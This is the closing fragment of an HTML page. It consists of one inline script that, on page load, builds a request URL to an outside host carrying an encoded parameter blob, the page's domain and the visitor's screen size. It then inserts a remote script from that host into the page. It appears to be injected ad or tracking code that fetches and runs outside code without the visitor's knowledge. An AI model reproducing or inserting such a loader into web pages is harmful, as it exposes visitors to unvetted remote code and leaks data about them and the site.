    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnrrKOU8lJFivBbTBE8leu0SzzztLi0UoOFlh10bdQf6lm3sR3IxFRWTs5Kt1IwjB6iUX7nbpjt3ApSklGMW1SYv0rq15fLdI%2bBQhZiqg%2fXw78OktvT0B377hBAF15%2bfFQJ9JZyjRpro7%2fxNwJUWjdL4f65POBplzJTiV6Bum%2fIRLeYM6wFJ8KCVi4VN%2bESqdbQMUpVKJZv8Rm6KTsqXXTAnWJJQ1gJuCEMLYUQlAGmkiHqwzz5UV9NmZAsKTu02xRwwF2foNGWRmKgj4zvM3S4bHMtufTY1CIx4uY%2fpWoSMnEWKZA9DjM%2fFXWIM9pQH3DyYj%2bCr88a3%2fQnxkMOAeqgdJ74fxkh8aDXzW8GoQ2PqREFGLgPH1o%2bCr19W9zgF2UriDuhDe4CCeNdj%2frL7Pi25Y%2bNuaZpDl8SqEULI9Fsc1%2b36hiwXgXZYhkWn7DMUjf6IeJldlMWu2NjbDHAgetBXnXV1BT6iB9H5zq%2bcbueXWcDrKEcGiRP6oMoPigyo4u" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>